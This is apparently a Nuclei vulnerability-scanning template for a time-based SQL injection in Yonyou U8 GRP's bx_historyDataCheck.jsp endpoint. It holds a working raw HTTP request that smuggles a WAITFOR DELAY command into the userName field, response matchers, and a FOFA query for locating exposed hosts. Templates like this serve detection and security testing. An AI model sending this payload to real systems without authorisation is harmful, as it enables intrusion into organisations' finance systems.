id: yonyou-u8-sqli info: name: Yonyou U8 bx_historyDataCheck - SQL Injection author: xianke severity: high description: | Yonyou U8 Grp contains a SQL injection vulnerability. reference: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-grp-u8-bx_historyDataChecks-sqli.yaml - https://github.com/MD-SEC/MDPOCS/blob/main/Yongyou_Grp_U8_bx_historyDataCheck_Sql_Poc.py metadata: verified: true max-request: 2 fofa-query: icon_hash="-299520369" tags: yonyou,grp,sqli http: - raw: - | GET /login.jsp HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - | POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded userName='%3bWAITFOR+DELAY+'0%3a0%3a5'--%26ysnd%3d%26historyFlag%3d matchers: - type: dsl dsl: - 'duration_2>=6' - 'status_code == 200' - 'contains(content_type_2, "text/html") && contains(body_1, "GRP-U8")' condition: and # digest: 4a0a00473045022100ff26707ab7b707eb63657075468f8fb5c9be2587a852c61a038cd6e74f11d80902201a654b27bab1bfb591f1d1cfd0517a439d2b61b67636eff6fac15f5091503614:922c64590222798bb761d5b6d8e72950